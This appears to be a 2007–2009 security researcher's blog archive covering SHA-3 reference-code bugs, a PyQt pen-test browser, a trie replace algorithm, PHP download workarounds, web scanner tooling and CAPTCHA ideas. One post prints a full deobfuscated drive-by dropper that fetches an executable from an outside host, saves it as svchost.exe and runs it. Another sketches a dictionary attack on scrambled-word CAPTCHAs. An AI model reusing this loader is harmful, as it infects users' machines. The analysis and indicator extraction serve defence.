
Saturday, February 21 2009

SHA-3 reference implementations buffer overflows

Fortify just posted a nice blog post about the audit they did of several of the reference implementations competing to become NIST's SHA-3.

They do not release much information on their findings: only one is described. I would really have liked to see how powerful the analysis was (if it was an analysis) that found these problems.

It would be nice too to see other tool vendors, such as Grammatech, Klocwork, Coverity, etc., do the same, and then start another competition ;)

I'd really like to emphasize the conclusions of Fortify's blog post:

Reference implementations don't disappear, they serve as a starting point for future implementations or are used directly. A bug in the RSA reference implementation was responsible for vulnerabilities in OpenSSL and two separate SSH implementations. They can also be used to design hardware implementations, using buffer sizes to decide how much silicon should be used.

The other consideration is speed, which will be a factor in the choice of algorithm. The fix for the MD6 buffer issues was to double the size of a buffer, which could degrade the performance. On the other hand, memory leaks could slow an implementation. A correct implementation is an accurate implementation.

Tuesday, January 13 2009

SSL Fails! SSLFail.com

Marcin and Tyler just started a new website, which is kind of fun: sslfail.com (a wall of shame for SSL certificates?)

So now, Google & co, fix your certificates :P

Wednesday, September 10 2008

PyQt and WebKit integration: unexpected limitation [fixed]

For those who don't know Qt: it is a huge and mature framework for developing GUIs and more on different platforms (read: multi-platform). I have already done some development using Qt and C++ (especially when I was working at the GERAD).

As Marcin and I wanted to have a look at some technologies involving a browser, I decided to look at Qt and its almost-fresh WebKit integration.

The integration of WebKit in a framework like Qt lets the developer embed, supposedly in an easy manner, a browser that supports the basic web technologies, HTML, CSS and JavaScript, in their application (it seems that Flash is going to be supported soon, and anyway one can write one's own plugin in order to interact with some specific content).

And indeed it is easy... I used PyQt to develop a very simple prototype and see what we are able to do with this new technology. As I already know Python and Qt, it was easy for me to start and be reasonably effective. So, after a few hours of work, documentation reading and trying to understand why and how the Python version of Qt was using such or such thing compared to the C++ version, I got this workable browser that allows dynamic JavaScript injection through a console, viewing the source and a simple encoding converter (click on the image to see the full screenshot):



At this point, I was actually very excited: less than 500 lines of Python to create that... it seemed worth a few days of work to create a useful tool: the Swiss Army knife of the pen-test.

My next and logical step was to extend the current tool to have Tamper Data-like capabilities (e.g. being able to hijack the HTTP request and then tamper with the GET/POST data).

And here come the problems... it's apparently not possible to get the current request and then reply when using the WebKit widget in Qt (QWebView). I tried to use a delegate QNetworkAccessManager in order to overload the POST/GET requests, since this object is used to set the proxies etc., but nothing... I think they just didn't open this possibility for some reason.

Oh well, I then stopped developing this prototype and will try to contact Qt experts/developers just to figure out whether there is another way to do it. I thought of a solution, which would be to have my own HTTP manager using QHttp to do the request, get the response etc. and then send the content to the browser; this would be great in a web apps scanner, but for the use I wanted, that would create a huge limitation for user interaction and especially for Ajax applications. So, the prototype stays here until I find a solution or Qt opens their network management under the QWebView widget...


Fixed:

An update to let you know that I actually fixed the problem. It was really stupid of me: I should really check whether a method is virtual or not before trying to overload it :/ shame on me! (In Qt, the hook on QNetworkAccessManager is its protected virtual createRequest() method, which the page calls for every request it issues; the get()/post() convenience methods are not virtual, so overriding them in a subclass changes nothing for QWebView.)

So now, I am able to have Firefox/Tamper Data/Firebug in one tool :)

Monday, July 28 2008

Trie based fast and massive replacement (Algorithm)

While working on the C++ version of scalp, I had to do massive simple transformations of a given text, i.e. replacements of words by others.

Since the main way to do this (a loop which does one replacement at a time) is very inefficient, I decided to find something faster. I then came up with a tree-based replacement algorithm; I believe this is fairly well known, but I had never heard of such an algorithm. It basically uses a non-compact trie in order to have an efficient search for the current word.

The main algorithm is very simple and similar to a state machine where the state depends on the next character in the trie. For example, if we want to replace the words "ba", "me", "mp" in a text, the trie will be the following one:

The idea is then to iterate over all the characters in the text, and for each letter determine whether it can start a word to replace (simply by looking whether the letter is a child of the trie root). Then we iterate over the next letters in the text to see whether the sequence of letters is an actual word to replace (every time, the same methodology is used: look in the children of the current state of our iterator in the trie).

This algorithm seems more efficient than the simple replace used in a loop: the text is walked once, and at each position the descent in the trie is bounded by the length of the longest key, instead of scanning the whole text once per dictionary word (roughly O(n·L) against O(n·M) for a text of n characters, M keys and a longest key of L characters).


I ran a little statistical comparison between the two algorithms: mine and the simple loop one. The test bed is quite simple and uses randomly generated text which contains the words to replace with a certain density. In order to create statistics, I made all the sizes vary and I aggregated the results from the same dictionary size. So, for a given dictionary size (let's say 200 words to replace), a text has been generated with a density varying from 0.1 to 0.5 (from 10% to 50% of the words in the text will be words to replace), and finally the size of the text varies from 25 to 200 words (and words are randomly generated to be from 5 to 32 characters long).
As I said previously, the results from the same dictionary size have been aggregated since I've seen in practice that the result mainly depends on the dictionary size (it also obviously depends on the size of the text, but as this is a constant for the 2 algorithms, I can compute the mean of the different data to extract the average gain for a particular dictionary size).

Finally, here is the curve that shows the logarithmic-looking progression of the gain compared to the classical method:

The reference replace implementation which has been compared to the one I developed is the following (STL/C++ implementation):

void str_replace(string& where, const string& what, const string& by) {
  for (string::size_type i  = where.find(what);
                                 i != string::npos;
                                 i  = where.find(what, i + by.size()))
    where.replace(i, what.size(), by);
}
and has been used M times (M is the size of the dictionary).
I also decided to release a very early version of this replace algorithm (which is not templated yet): stree.h, which uses the great STL-friendly tree structure from Kasper Peeters.

As for the data, here is the code I used to generate the dictionary and the text with a given density: genRandData.cpp
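To make the algorithm concrete, here is an added example written for this page (it is not the stree.h code from the post, and it is in Python rather than C++): a non-compact trie built from the replacement dictionary, one left-to-right pass that takes the longest key at each position, and the loop-of-replace reference method for comparison. It also shows a case the post does not mention: since the trie does a single pass, a replacement is never re-matched by a later key, while the sequential loop chains them. The random text generator and the `time_both` helper are constructed here to mirror the post's benchmark setup (word lengths 5 to 32, a density of dictionary words), not to reproduce its numbers.

```python
import random
import time


class ReplaceTrie:
    """Non-compact trie over the keys of a replacement dictionary.

    Each edge is one character; a node holding the key None is a terminal
    and stores the replacement for the key spelled by the path to it.
    """

    def __init__(self, mapping):
        self.root = {}
        for key, value in mapping.items():
            if not key:
                raise ValueError("empty keys cannot be replaced")
            node = self.root
            for ch in key:
                node = node.setdefault(ch, {})
            node[None] = value

    def replace(self, text):
        """One pass over text; at each position take the longest matching key."""
        out = []
        i, n = 0, len(text)
        while i < n:
            node, j, best = self.root, i, None
            # Walk down the trie while the next character is a child; remember
            # the last terminal seen so overlapping keys resolve to the longest.
            while j < n and text[j] in node:
                node = node[text[j]]
                j += 1
                if None in node:
                    best = (j, node[None])
            if best is None:
                out.append(text[i])
                i += 1
            else:
                out.append(best[1])
                i = best[0]  # skip past the matched key; never re-scan the output
        return "".join(out)


def sequential_replace(text, mapping):
    """The reference method from the post: one full-text replace per key."""
    for key, value in mapping.items():
        text = text.replace(key, value)
    return text


ALPHABET = "abcdefghijklmnopqrstuvwxyz"


def random_text(n_words, dictionary, density, rng):
    """Constructed input in the spirit of genRandData: words of 5..32 letters,
    a fraction `density` of them drawn from the dictionary."""
    words = []
    for _ in range(n_words):
        if rng.random() < density:
            words.append(rng.choice(dictionary))
        else:
            words.append("".join(rng.choice(ALPHABET) for _ in range(rng.randint(5, 32))))
    return " ".join(words)


def time_both(dict_size=200, n_words=2000, density=0.3, seed=1):
    """Return (trie_seconds, loop_seconds) for one replacement of the same text."""
    rng = random.Random(seed)
    keys = ["".join(rng.choice(ALPHABET) for _ in range(rng.randint(5, 12)))
            for _ in range(dict_size)]
    mapping = {k: k.upper() for k in keys}   # upper-case values cannot be re-matched
    text = random_text(n_words, keys, density, rng)
    trie = ReplaceTrie(mapping)
    t0 = time.perf_counter()
    trie.replace(text)
    t1 = time.perf_counter()
    sequential_replace(text, mapping)
    t2 = time.perf_counter()
    return t1 - t0, t2 - t1
```

With the post's own keys ("ba", "me", "mp") both methods agree; they diverge as soon as one key's replacement contains another key (`{"a": "b", "b": "c"}` turns "ab" into "bc" with the trie and "cc" with the loop), which is exactly the property you want when the transformation is an encoder or a sanitizer.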

Monday, July 21 2008

A morning at work: Content-Disposition blocked!

One morning I woke up, and all the websites using a download system didn't work anymore. Yeah, this is what I saw. I guess I don't need to tell you that it was such a pain and that all the downloading systems on the different websites we have were not working anymore.

Such big stress thinking at first that everything is broken; then, after some time, I realized that the problem is the Content-Disposition header field, which is dropped.

I wouldn't say I'd like to thank the admin who doesn't tell people about the modification... Anyway, I guess it's always like that?

The Content-Disposition HTTP header field tells the browser how the data should be presented (inline, or as an attachment, and under which file name). I basically use it to force a download with a PHP script such as:

<?php
  // download.php
  // some checks on the $fname variable to be sure
  // it exists and is in the allowed directories...
  header("Pragma: public");
  header("Expires: 0");
  header("Cache-Control: must-revalidate, pre-check=0");
  header("Content-Type: application/octet-stream");
  header("Content-Length: " . filesize($fname));
  // quote the name: a space or ';' in it would otherwise break the header
  header('Content-Disposition: attachment; filename="' . basename($fname) . '"');
  header("Content-Description: File Transfer");
  @readfile($fname);
  exit;
?>

Now, if you cannot send the Content-Disposition field, the browser falls back on the last segment of the URL and downloads a file called "download.php". A quite simple workaround is to fool the browser by making the name of the requested URI the same as the file it should download, using mod_rewrite:

RewriteEngine On
RewriteBase /mydir
RewriteRule   ^download/([^/]+)$ /mydir/download.php?file_redir=$1

And just a simple modification of the original script to detect the "file_redir" GET variable. But since we don't want to modify all the (generated or not) HTML files, we need to do the redirection automatically:

<?php
// download.php
// $fname is the file to serve; $downloadDir is the only directory files
// may be served from (the checks below reject anything outside it).
$downloadDir = '/var/www/files';   // adjust to your setup
if (isset($_GET['file_redir'])) {
  // keep only the file name: this drops any "../" or absolute path
  $fname = basename($_GET['file_redir']);
  $path = $downloadDir . '/' . $fname;
  if ($fname === '' || !is_file($path)) {
    header("HTTP/1.0 404 Not Found");
    exit;
  }
  header("Pragma: public");
  header("Expires: 0");
  header("Cache-Control: must-revalidate, pre-check=0");
  header("Content-Type: application/octet-stream");
  header("Content-Length: " . filesize($path));
  header("Content-Description: File Transfer");
  readfile($path);
  exit;
}
else {
  // redirect to the rewritten URL whose last segment is the file name,
  // so the browser names the download correctly without Content-Disposition
  header("Location: /mydir/download/" . rawurlencode(basename($fname)));
  exit;
}
?>

Then you don't have to change all your pages. This is of course a (not so?) temporary solution, since the server does extra work (one redirect per download) to reach the same state, the download of the file, but well, it does the job of fooling the browser...
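The comment "careful of directory traversal etc." in the script above is where this scheme is most often broken, so here is an added example of that check and of the header it protects, written for this page in Python rather than PHP (it is not the post's code). The allowed directory, the `/mydir/download` prefix and the file names are assumptions for the illustration; the path check is done with `posixpath` so it is pure string logic, and a real handler would additionally resolve both sides with `os.path.realpath` so a symlink cannot escape the directory.

```python
import posixpath
from urllib.parse import quote

# ASCII control characters: never allowed in a served name (CR/LF would let a
# request inject extra response headers through Content-Disposition).
CONTROL_CHARS = {chr(c) for c in range(0x20)} | {chr(0x7F)}


def safe_download_path(allowed_dir, requested):
    """Absolute path of `requested` inside `allowed_dir`, or None if rejected.

    Only a bare file name is accepted: "../x", "sub/x", "/etc/passwd" and ""
    all normalize to a parent directory other than allowed_dir.
    """
    base = posixpath.normpath(allowed_dir)
    candidate = posixpath.normpath(posixpath.join(base, requested))
    if posixpath.dirname(candidate) != base:
        return None
    name = posixpath.basename(candidate)
    if name.startswith(".") or any(ch in CONTROL_CHARS for ch in name):
        return None   # no dotfiles (.htaccess) and no header injection
    return candidate


def content_disposition(filename):
    """Attachment header carrying the name both quoted (RFC 6266) and
    percent-encoded in filename* (RFC 5987), so odd characters survive."""
    if any(ch in CONTROL_CHARS for ch in filename):
        raise ValueError("control character in file name")
    quoted = filename.replace("\\", "\\\\").replace('"', '\\"')
    return 'attachment; filename="%s"; filename*=UTF-8\'\'%s' % (
        quoted, quote(filename, safe=""))


def download_url(prefix, filename):
    """URL whose last path segment is the file name: this is what the post's
    mod_rewrite trick relies on when a proxy strips Content-Disposition."""
    return prefix.rstrip("/") + "/" + quote(filename, safe="")


def plan_download(allowed_dir, requested, prefix="/mydir/download"):
    """Everything download.php needs: the file to read and the headers to send."""
    path = safe_download_path(allowed_dir, requested)
    if path is None:
        return None
    name = posixpath.basename(path)
    return {
        "path": path,
        "url": download_url(prefix, name),
        "headers": {
            "Content-Type": "application/octet-stream",
            "Content-Disposition": content_disposition(name),
        },
    }
```

Note that the redirect URL is percent-encoded: a name with a space or a quote must still land in the single last path segment that `RewriteRule ^download/([^/]+)$` captures, otherwise the browser's fallback name is wrong again.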

Tuesday, May 20 2008

ph34r the script kiddies: Whitehouse.org

I was just reading this news (reported by Kanedaa) and decided to look closer at the content of this "malware" stuff to see whether there were some nice techniques behind this so-called "attack".

Oh man! How disappointing to see that this was done by script kiddies... the "obfuscation" consists of 3 levels of URL-encoded JavaScript... yeah... URL encoding is for sure an obfuscation very hard to prettify. And the final code was not obfuscated either, just this (the only trick left is that the ProgIDs and CLSIDs are split into concatenated string pieces, presumably to defeat naive signature matching):

function myCreateOB(o, n) {
    var r = null;
    try { eval('r = o.CreateObject(n)') }catch(e){}
    if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){} }
    if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}}
    if (! r) {try { eval('r = o.GetObject(n)') }catch(e){}  }
    return(r);
}

function Go(a) {
    var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll");
    var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am");
    var e = s.Environment("Process");
    var xml = null;
     var url = 'http://ad.ox88.info/bbs.jpg';
    var bin = e.Item("TEMP") + "svchost.exe";
    var dat;
    try { xml=new XMLHttpRequest(); }
    catch(e) {
        try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP"); }
        catch(e) {
            xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP");
        }
    }
    if (! xml) return(0);
    xml.open("GET", url, false)
    xml.send(null);
    dat = xml.responseBody;

    o.Type = 1;
    o.Mode = 3;
    o.Open();
    o.Write(dat);
    o.SaveToFile(bin, 2);

    s.Run(bin,0);
}

function mywoewd() {
    var i = 0;
    var ss11='{7F5B7F';
    var ss12='63-F06';
    var ss13='F-4331-8A';
    var ss14='26-339E0'
    var ss15='3C0AE3D}';
    var ss1=ss11+ss12+ss13+ss14+ss15
    var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}";
    var ss3="{AB9"+"BCEDD-E"+"C7E-47"+"E1-93"+"22-D4"+"A210617116}";
    var ss4="{00"+"06F"+"033-000"+"0-0000-C0"+"00-00000"+"0000046}";
    var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}";

    var t = new Array(ss1,ss2,ss3,ss4,ss5,null);
    while (t[i]) {
        var a = null;
        if (t[i].substring(0,1) == '{') {
         a = document.createElement("object");
         a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
        } else {
            try { a = new ActiveXObject(t[i]); } catch(e){}
        }
        if (a) {
            try {
                var b = myCreateOB(a, "WSc"+"rip"+"t.Sh"+"ell");
                if (b) {
                    Go(a);
                    return(0);
                }
            } catch(e){}
        }
        i++;
    }
}

As reported by Trend Micro, this is supposed to download the trojan TROJ_DELF.GKP... that doesn't mean anything to me, but anyway, my AV didn't detect it :)
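The two steps described above (peeling the URL-encoding layers, then reading past the split strings) are routine enough to script. Here is an added example written for this page, not the post's tooling: it rebuilds the three-layer URL encoding on a short excerpt of the deobfuscated code shown above (the excerpt is a constructed sample, only the lines that assemble names from string pieces), decodes until the text stops changing, folds adjacent `"a"+"b"` literals back together, and pulls out the URL, ProgIDs and CLSIDs as indicators. The literal folding is a heuristic for this style of code: it only merges adjacent literals of the same quote style and leaves variables alone, so `ss1` in the page's sample (built from variables) would need a second pass of variable substitution.

```python
import re
from urllib.parse import quote, unquote

# Constructed sample: a few lines from the page's deobfuscated payload, kept
# exactly as the script kiddie wrote them (names split across literals).
SAMPLE_PAYLOAD = r'''
var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll");
var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am");
var url = 'http://ad.ox88.info/bbs.jpg';
var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}";
var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}";
xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP");
'''


def wrap_url_encoding(script, layers=3):
    """Re-create the 'obfuscation' the post describes: URL-encode N times."""
    for _ in range(layers):
        script = quote(script, safe="")
    return script


def peel_url_encoding(blob, max_layers=10):
    """Decode until a pass changes nothing. Returns (plaintext, layers_removed).
    The cap guards against input crafted to keep a decoder busy."""
    layers = 0
    while layers < max_layers:
        decoded = unquote(blob)
        if decoded == blob:
            break
        blob, layers = decoded, layers + 1
    return blob, layers


_DQ = re.compile(r'"([^"\\]*)"\s*\+\s*"([^"\\]*)"')
_SQ = re.compile(r"'([^'\\]*)'\s*\+\s*'([^'\\]*)'")


def fold_string_concats(js):
    """Collapse "a"+"b" (or 'a'+'b') into one literal, repeating until stable,
    so the real ProgIDs, CLSIDs and URLs appear in clear."""
    prev = None
    while prev != js:
        prev = js
        js = _DQ.sub(lambda m: '"%s%s"' % m.group(1, 2), js)
        js = _SQ.sub(lambda m: "'%s%s'" % m.group(1, 2), js)
    return js


_GUID = re.compile(r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")
_URL = re.compile(r"""https?://[^\s'"]+""")
_PROGID = re.compile(r'"([A-Za-z]+(?:\.[A-Za-z0-9]+)+)"')   # e.g. "WScript.Shell"


def extract_iocs(js):
    """Indicators worth a blocklist or a detection rule, deduplicated."""
    return {
        "urls": sorted(set(_URL.findall(js))),
        "clsids": sorted(set(_GUID.findall(js))),
        "progids": sorted(set(_PROGID.findall(js))),
    }


def analyse(blob):
    """Full pipeline: peel encoding layers, fold literals, extract IOCs."""
    plain, layers = peel_url_encoding(blob)
    iocs = extract_iocs(fold_string_concats(plain))
    iocs["layers"] = layers
    return iocs
```

Run on the wrapped sample, `analyse` reports 3 layers, the download URL, the two ProgIDs used to fetch and write the binary (`Microsoft.XMLHTTP`, `ADODB.Stream`), the `WScript.Shell` used to run it, and the CLSIDs the loader tries in turn, which is the list a detection rule should key on rather than the encoded blob.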

Wednesday, December 5 2007

Static Analysis Framework: PHP-Ast/Oracle

In my previous blog post, I talked briefly about PHP-Ast/Oracle, a PHP source code static analysis framework. I am developing it in order to play with source code and security. The goal of this framework is to be able to perform different types of operations on PHP source code. I am releasing this tool as it is because I think people may be interested in it... Anyway, I learned a lot doing this.

PHP-Ast/Oracle is developed in C++ and the tool has been developed mainly for:

How it works

The source code repository is divided in 2 parts:

  • php-ast is the converter from PHP to XML
  • php-oracle is the actual engine

php-oracle takes an XML file as input, which is the output of php-ast. In the SVN there are some Python scripts I used in order to combine the 2 tools (they may be outdated, i.e. they may not work with the current php-oracle).

How I think you could use php-oracle

I do not intend to make a clean build with an executable etc.; I just provide the source code. I decided to give only the source code because I don't want to spend too much time on creating clean software; it's only research-oriented stuff. Furthermore, there is not much documentation in the source code (advantages of being alone to develop such a tool), so only really interested people will download this! I can then help them if they have questions about how it works etc.

Getting the source code

You can download the source here: php-ast-oracle.zip

And the trac repository has more documentation about what the framework actually does: http://trac2.assembla.com/php-ast

Development

The tool is in perpetual development. I don't want to create real software from it, but I think people can use it to perform security analysis, compute stuff, make code transformations and so on.

Wednesday, November 21 2007

The new grabber

Grabber was a nice project. The main goal for me was to learn about web application security/scanners; I didn't really know much before I started this project. But now that I've been playing with web apps scanners for more than 10 months, I need to create a new one and go deeper into heuristics, browser integration and AI.

Grabber was in fact more a spider+fuzzer than anything else... Not a good web apps scanner at all. Thinking of the analysis engine... It's something kind of stupid: no JavaScript execution, just simple heuristics for parsing and Levenshtein distances ;)

Anyway, I decided to start this project over. It's not going to be a bunch of Python scripts anymore; I am going to use Qt/C++ extensively. The idea of this project is to be pen-tester oriented and open: I want to create a kind of wrapper around WebKit (especially using QtWebKit), a spider as core utility and, after that, plugins. The plugins should be either in C++ or JavaScript (QtScript actually). So far, we are 3 guys thinking about this project: we haven't started yet, but we are open to every contribution; the project will of course be free and GPL'd.

I just post this to get some comments or suggestions about what a web apps scanner should do... Feel free to comment/mail...

Tuesday, July 10 2007

Website functionalities coverage

Coverage is a tool written in Python which allows you to track which functionalities/web pages are reached on your website. I use this tool in my web apps scanner evaluation methodology in order to know whether the scanner was able to reach every page and every functionality of my test apps.

Anyway, this tool is pretty easy to use even if it requires a MySQL database to store the entry points of the application. Basically, you set up the database, you insert the entry points into your code and you run the Python script, which generates an HTML report with SVG graphs reporting the coverage of your application.

Here is a report example

Installation

1/ Database

The database design I used for storing the needed information is the following:

CREATE TABLE `coverage` (
`CoverageID` int(32) NOT NULL auto_increment,
`Apps` varchar(128) character set utf8 collate utf8_unicode_ci NOT NULL,
`Date` date NOT NULL,
`EntryPoint` varchar(255) character set utf8 collate utf8_unicode_ci NOT NULL,
`Origin` varchar(255) character set utf8 collate utf8_unicode_ci NOT NULL,
PRIMARY KEY  (`CoverageID`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1;
  • Apps: name of the covered application
  • Date: time when the entry point is reached
  • EntryPoint: Name of the entry point with a special format:


** File Reached:
Touch_ + Name of the file with extension, example, Touch_Index.Php, Touch_Search.Php etc.

** Functionality Reached:
Name of the functionality + _ + Name of the file with extension; for example, this sequence of entry points for the page Login.php of a given application:

  1. Touch_Login.Php : Enter the page Login.Php
  2. Username_Password_Login.Php : The username and the password are fed in
  3. Call_Function_Login.Php : Call the function login()
  4. Call_Function_Succeed_Login.Php : The function login succeeded
  5. Call_Function_Error_Login.Php : The function login reported an error
  • Origin: the origin string is the concatenation of the MD5 of the HTTP_USER_AGENT, a pipe and the date; this ID + date is used to be sure to study the same user. (The User-Agent is client-controlled and shared by every client running the same browser, so this only tells scanner runs apart on a private test bed; it does not identify a user.)
<?php
// ...
$origin = md5($_SERVER['HTTP_USER_AGENT']). '|' . date("j-m-y H:i");
?>

2/ In the code

So, you will need to add lots of entry points in your app's code. I made a PHP source file to do that more easily:

<?php
class Coverage{
 private $coverage_id = false;
 private $coverage = null;
 function __construct() {
  $this->coverage_id = true;
  $this->coverage = mysql_connect('192.168.1.3:3306', 'test', 'test');
  mysql_select_db("test_collect");
 }
 function send($entryPoint){
  if ($this->coverage) {
   $origin = "";
   $origin .= md5($_SERVER['HTTP_USER_AGENT']);
   $origin .= ('|' . date("j-m-y H:i"));
   $entryPoint = mysql_real_escape_string($entryPoint);
   mysql_query("INSERT INTO coverage VALUES(NULL,'BankApp',NOW(),'$entryPoint','$origin')");
  }
 }
};
	
$coverage = new Coverage();
// $supportCodeCoverage is assumed to be a global switch set in the
// application's configuration: leave it false outside the test bed
function register_EntryPoint($entryPoint) {
 global $coverage, $supportCodeCoverage;
 if ($supportCodeCoverage) {
  $coverage->send($entryPoint);
 }
}
?>

Insert this code in a header or something and call:

register_EntryPoint('Touch_MyFile.Php');

etc. in your code wherever there is a functional difference.

Run the tool

To run the tool, you need to have:

  • Python + MySQLdb (the Python MySQL API)
  • The date (in SQL format) you want to cover; for now, it's only one day
  • The Origin ID of the user (the MD5(HTTP_USER_AGENT)); basically, you will look for this in the database, or get it from your code etc.


example:

$ python coverage.py 2007-06-28 41942da0293d0b8afcfab4c2d10c2401
$ python coverage.py 2007-04-12

The script must be in the same directory as your files for now... you can download the archive here: coverage.zip

Monday, June 25 2007

How not to waste 6hours?

Make sure that your test case is correct!!!!!

Damn, I'm stupid. I was working on Grabber's session state management, and of course I did a small test case with a couple of pages to be sure the spider can reach every page. But my test case was just stupid: calling my index twice kept my session alive, but the variables were set in a crazy order, which had the same effect as destroying the session.

Anyway, now it works! At least in the next Grabber release:

  • Multi-site support
  • Multi-threading
  • Better session state management: you can now add the login information in the configuration file
  • A new XSS detector based on a few vectors and some variations on them. The XSS disclosure based on RSnake's Cheat Sheet is still here, but I needed a faster one...
  • A module which makes Grabber usable as a simple spider and saves the information in an XML file

I don't know yet when I'm going to release the version; I need to make sure it works correctly and is stable. I also need to create something to generate nice reports (maybe simple XSLT sheets, developer/user side) and I want to work more on the hybrid mechanism using different tools (Fortify, Pixy, PHP-SAT, SWAAT...)

Wednesday, May 30 2007

Such a noisy thing with SWAAT

In one of my last posts, I made a comparison between two PHP source code security analyzers: SWAAT and PHP-SAT. The results were close to saying that SWAAT was really better than PHP-SAT.
I started working on the configuration of PHP-SAT and it looks to be quite powerful (well, after talking with Eric Bouwers, I'm waiting for the next release) and I think I will be able to get good results by combining a security-oriented configuration with some additional bug patterns.
On the other hand, SWAAT is really limited for now. As an example, I made a simple PHP script with only SQL queries inside: every line is highlighted as flawed (and with a MEDIUM level)!! This is simply stupid; they would do better not to report anything than doing that... just say that you don't support SQL injection for now... Anyway, SWAAT is for me the tool to keep an eye on; I will try to develop some features for it, especially for XSS detection and SQL injection findings...

Tuesday, May 1 2007

XUL or extjs?

After a project, AK gives a short comparison of these two client-side technologies: http://www.akbkhome.com/blog.php/View/135/XUL_or_extjs.html

Wednesday, April 11 2007

Pretty good CAPTCHA: Against the current OCR

Today, it reminded me of a study from Cambridge (the "Cmabrigde" one: http://www.mrc-cbu.cam.ac.uk/~mattd/Cmabrigde/). The idea is that a human needs only a few letters in a word to understand that word (this is not true for every word, but it should not be hard to find suitable ones).
So the idea is basically to create a CAPTCHA as an image with a word, but the word would be scrambled in a way that a human can still read, such as:

CNOTNENT
MANAEGR
KITHCEN
etc.


Okay, with a current OCR-based attack bot, it's doable if you have a dictionary: use something like the Levenshtein distance and take the dictionary word that minimizes the distance to the word your OCR found.
But well, the CAPTCHA does not necessarily contain only one word...
The only problem I can see with this method is that the dictionary used to generate the CAPTCHA should be in the language of the targeted human. But well, for most websites, you know what readers/users you have...

If I have time I'd try to create a lib for this...
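To show both sides of this idea, here is an added example written for this page (not a library from the post): the scrambling step, the dictionary-plus-Levenshtein attack the post sketches, and a cheaper attack the post does not mention that follows from how the scrambling works. Shuffling the inner letters never changes the first letter, the last letter or the multiset of letters in between, so an attacker can index the dictionary by that signature and resolve a clean OCR read exactly, falling back to edit distance only for noisy reads. The dictionary is a constructed seven-word list for the illustration; "CNOTNENT" from the post has an extra N, which is a good test of the fallback.

```python
import random

# Constructed word list for the example; a deployment would use a real
# word list in the users' language, as the post notes.
DICTIONARY = ["CONTENT", "CONTEST", "MANAGER", "MANNERS", "KITCHEN", "KITTENS", "MESSAGE"]


def scramble(word, rng):
    """CAPTCHA side: keep the first and last letter, shuffle the inside."""
    if len(word) < 4:
        return word
    middle = list(word[1:-1])
    rng.shuffle(middle)
    return word[0] + "".join(middle) + word[-1]


def levenshtein(a, b):
    """Edit distance, the metric the post proposes for the OCR attack."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def nearest_by_distance(ocr_read, dictionary=DICTIONARY):
    """Attack 1 (the post's): the dictionary word closest to the OCR output.
    Ties are broken alphabetically so the result is deterministic."""
    return min(dictionary, key=lambda w: (levenshtein(ocr_read, w), w))


def signature(word):
    """What scrambling preserves: outer letters plus the sorted inner letters."""
    return (word[0], word[-1], "".join(sorted(word[1:-1])))


def resolve_by_anagram(ocr_read, dictionary=DICTIONARY):
    """Attack 2: exact lookup by signature. With a clean OCR read this needs
    no distance computation at all, and a collision between two dictionary
    words with the same signature is the only way it can be ambiguous."""
    target = signature(ocr_read)
    return sorted(w for w in dictionary if signature(w) == target)


def solve(ocr_read, dictionary=DICTIONARY):
    """Exact signature match first, Levenshtein fallback for noisy OCR reads."""
    exact = resolve_by_anagram(ocr_read, dictionary)
    if len(exact) == 1:
        return exact[0]
    return nearest_by_distance(ocr_read, dictionary)


def scramble_is_solvable(word, seed, dictionary=DICTIONARY):
    """Does the attack recover `word` from one random scrambling of it?"""
    return solve(scramble(word, random.Random(seed)), dictionary) == word
```

The consequence for the CAPTCHA designer is that the scrambling adds nothing against a bot that already has the dictionary: the hard part for the attacker remains the OCR, exactly as with an unscrambled word, and using several words per image (as the post suggests) only multiplies the lookups.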

Friday, March 30 2007

Firebug: XHR prototype overloading failure

I love Firebug; it is something really good for developing web apps. But today I ran into an issue which was pretty annoying! First of all, when I develop a small app, I usually do it under Firefox only, with Firebug and other nice extensions loaded.
But today I got an issue when I wanted to overload the XMLHttpRequest send function to do other things with it: Firebug simply does not allow me to do this, but it works well if I want to overload the 'open' function!

Pretty annoying, but you cannot do this with Firebug activated:

// keep a reference to the native send(), then wrap it
var originalSend = XMLHttpRequest.prototype.send;
XMLHttpRequest.prototype.send = function(data) {
    var sData = transformation(data);
    return originalSend.call(this, sData);
};

Tuesday, March 27 2007

Obfuscation and Spam Bots: Update

Sven Vetsch/Disenchant has just sent me an email with the Vigenère version of the obfuscation script. This version is quite cute, but it's true that the public key is not secure enough... let's work on another version with public and private keys!

You can find Disenchant's script here.

Obfuscation and Spam Bots

Always on the same subject, spam bots: I was thinking that obfuscation would be a good way to prevent spam bots. So I first started playing with reversed strings; even if it may be obvious to the bots, I'm pretty sure it's still harder than the previous technique, which can almost be passed by an intelligent-but-with-no-JavaScript-support parser.

So this version is quite simple:

<script>
String.prototype.reverse = function() { return this.split('').reverse().join(''); };
// Called from the form's onsubmit: rename every field just before the
// browser submits, so a bot that does not run JavaScript posts the
// reversed names and is rejected server-side. The handler runs first
// and returning true lets the normal submission proceed.
function reverseNames(form) {
	var elements = form.elements;
	for (var i = 0; i < elements.length; i++) {
		elements[i].name = elements[i].name.reverse();
	}
	return true;
}
</script>
...
